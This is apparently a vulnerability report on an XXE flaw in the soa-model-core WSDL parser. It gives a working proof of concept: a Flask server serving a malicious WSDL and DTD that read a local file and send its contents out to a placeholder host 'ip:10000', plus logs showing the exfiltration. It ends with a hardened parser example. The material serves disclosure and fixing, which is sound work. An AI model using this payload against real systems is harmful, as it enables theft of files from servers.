There is an XXE vulnerability in parsing wsdl.
Add the latest version of soa-model-core to pom.xml.
```xml
<!-- https://mvnrepository.com/artifact/com.predic8/soa-model-core -->
<dependency>
    <groupId>com.predic8</groupId>
    <artifactId>soa-model-core</artifactId>
    <version>1.6.3</version>
</dependency>
```
The XXE vulnerability appears when fetching and parsing a remote WSDL file.
```java
import com.predic8.wsdl.*;

public class testxxe {
    public static void main(String[] args) {
        WSDLParser parser = new WSDLParser();
        Definitions defs = parser.parse("http://ip:10000/testxxeService?wsdl");
    }
}
```
Construct a server with an evil WSDL file using Flask.
```python
from flask import Flask, Response,request

app = Flask(__name__)


@app.route('/testxxeService', defaults={'path': ''})
def catch_all(path):
    global num
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://ip:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml',status=200)


@app.route('/data.dtd', defaults={'path': ''})
def hello(path):
    global num
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip:10000/?filecontent=%file;'>">
%int;
%send;"""
    return Response(xml, mimetype='text/xml',status=200)


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)
```
Create a test file /tmp/123
```
$ echo 123123 > /tmp/123
$ cat /tmp/123
123123
```
Run the Java code, and the XXE attack succeeds.
```
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /testxxeService?wsdl HTTP/1.1" 200 -
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /data.dtd HTTP/1.1" 200 -
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /?filecontent=123123 HTTP/1.1" 404 -
```
core/src/main/groovy/com/predic8/schema/Include.groovy line 42:

```groovy
def incToken = XMLInputFactory.newInstance().createXMLStreamReader(resource)
```

core/src/main/groovy/com/predic8/soamodel/AbstractParser.groovy line 51:

```groovy
XMLInputFactory.newInstance().createXMLStreamReader(res)
```
Reference: https://stackoverflow.com/questions/53934352/xmlstreamreader-inputstream-xxe-vulnerability-showing-up-in-checkmarx-report

XMLInputFactory allows loading DTDs, so there is an XXE vulnerability.
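As an added example (not part of the original issue and not the project's own code), a StAX factory configured with the standard `SUPPORT_DTD` and `IS_SUPPORTING_EXTERNAL_ENTITIES` properties, which is the usual hardening for bare `XMLInputFactory.newInstance()` calls like the two cited above. The class and method names are hypothetical, the sample documents are constructed, and it assumes the WSDL and schema files being parsed do not rely on a DOCTYPE.

```java
import java.io.StringReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public class HardenedStaxDemo {  // hypothetical class name, not from soa-model-core

    // Factory that neither processes DOCTYPE declarations nor resolves external entities.
    static XMLInputFactory hardenedFactory() {
        XMLInputFactory factory = XMLInputFactory.newInstance();
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return factory;
    }

    // Reads the whole document and returns its character data.
    // Throws XMLStreamException if the parser rejects the input.
    static String readText(XMLInputFactory factory, String xml) throws XMLStreamException {
        XMLStreamReader reader = factory.createXMLStreamReader(new StringReader(xml));
        StringBuilder text = new StringBuilder();
        try {
            while (reader.hasNext()) {
                if (reader.next() == XMLStreamConstants.CHARACTERS) {
                    text.append(reader.getText());
                }
            }
        } finally {
            reader.close();
        }
        return text.toString();
    }

    public static void main(String[] args) throws XMLStreamException {
        XMLInputFactory factory = hardenedFactory();

        // Constructed sample: an ordinary document without a DOCTYPE still parses.
        System.out.println("plain: " + readText(factory, "<definitions>ok</definitions>"));

        // Constructed sample: DOCTYPE declaring an external entity (placeholder path).
        String withDoctype = "<!DOCTYPE data [<!ENTITY ext SYSTEM \"file:///placeholder\">]>"
                + "<data>&ext;</data>";
        try {
            System.out.println("doctype: [" + readText(factory, withDoctype) + "]");
        } catch (XMLStreamException e) {
            System.out.println("doctype rejected: " + e.getMessage());
        }
    }
}
```

For the second document, either outcome (an exception or empty text) shows that the declared entity was not resolved.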
19de169
Fixes #281.
3aa295f